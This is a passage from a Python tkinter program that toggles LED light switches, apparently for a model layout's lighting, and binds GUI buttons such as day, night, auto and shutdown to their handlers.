with 'switch' == 'Switch X' in the list\n    if switch_state[switch] is False:\n        MainFrameLightButton[switch][\"image\"] = onButtonImage\n        SetLEDBrightness(light_toggled, light_toggled['value_on'])\n        switch_state[switch] = True\n    else:\n        MainFrameLightButton[switch][\"image\"] = offButtonImage\n        SetLEDBrightness(light_toggled, light_toggled['value'])\n        switch_state[switch] = False\n
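\n\n# Illustrative note (not part of the original file): light_list entry shape.\n# light_list.py is not shown here; judging from the keys accessed above, a\n# switchable entry plausibly looks like this hypothetical record (names and\n# values invented for illustration):\n#     {'name': 'Station lamp', 'module': 3, 'port': 7, 'mode': 'Constant',\n#      'value': 0, 'value_on': 800, 'switch': 'Switch 0'}\n# 'Random Day/Night' entries additionally carry 'value_day' and 'value_night',\n# from which RandomizeDayNightTime generates the time/value transition tables.\n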
\n\ndef toggle_switch0(event=0):\n    toggle_switch(0)\n\n\ndef toggle_switch1(event=0):\n    toggle_switch(1)\n\n\ndef toggle_switch2(event=0):\n    toggle_switch(2)\n\n\ndef toggle_switch3(event=0):\n    toggle_switch(3)\n\n\n# Define tkinter buttons and pads, and their event handlers\nButtonList = [\n    {'Name': MainFrameExitButton, 'Handler': MainFrameExitButtonPressed},\n    {'Name': MainFrameShutdownButton, 'Handler': MainFrameShutdownButtonPressed},\n    {'Name': MainFrameEditButton, 'Handler': MainFrameEditButtonPressed},\n    {'Name': MainFrameNightButton, 'Handler': go_to_night},\n    {'Name': MainFrameSkyButton, 'Handler': MainFrameSkyButtonPressed},\n    {'Name': MainFrameAutoButton, 'Handler': MainFrameAutoButtonPressed},\n    {'Name': MainFrameDayButton, 'Handler': go_to_day},\n    {'Name': MainFrameLightButton[0], 'Handler': toggle_switch0},\n    {'Name': MainFrameLightButton[1], 'Handler': toggle_switch1},\n    {'Name': MainFrameLightButton[2], 'Handler': toggle_switch2},\n    {'Name': MainFrameLightButton[3], 'Handler': toggle_switch3},\n    {'Name': ListFrameBackButton, 'Handler': ListFrameBackButtonPressed},\n    {'Name': ListFrameTestButton, 'Handler': ListFrameTestButtonPressed},\n    {'Name': TestFrameBackButton, 'Handler': TestFrameBackButtonPressed}]\n\n# Register the button event handlers to tkinter widget events\nfor Button in ButtonList:\n    Button['Name'].bind(\"